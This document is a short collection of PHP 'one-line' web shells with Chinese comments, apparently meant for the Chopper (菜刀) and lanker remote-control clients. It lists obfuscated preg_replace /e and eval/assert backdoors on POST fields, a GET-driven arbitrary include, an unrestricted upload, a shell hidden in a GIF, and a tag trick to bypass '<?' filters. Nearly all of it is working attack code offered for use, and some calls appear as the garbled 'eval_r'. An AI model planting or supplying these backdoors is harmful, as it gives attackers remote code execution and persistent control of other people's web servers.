//菜刀一句话
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
 
//危险的include函数，直接编译任何文件为php格式运行
$filename=$_GET['xbid'];
include ($filename);
 
//重命名任何文件
$reg="c"."o"."p"."y";
$reg($_FILES['MyFile']['tmp_name'],$_FILES['MyFile']['name']);
 
//菜刀一句话
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
 
//gif插一句话
//危险的include函数，直接编译任何文件为php格式运行，POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
include ($uid);
 
//典型一句话
<?php eval_r($_POST['s'])?>
<?php @eval_r($_POST['s'])?>
 
//使用lanker一句话客户端的专家模式执行相关的php语句
<?php assert($_POST['s']);?>
 
<?$_POST['a']($_POST['b']);?>
<?$_POST['a']($_POST['b'],$_POST['c'])?>
 
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
<?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
    
<O>h=@eval_r($_POST1);</O>
 
//绕过<?限制的一句话
<script language="php">@eval_r($_POST[sb])</script>
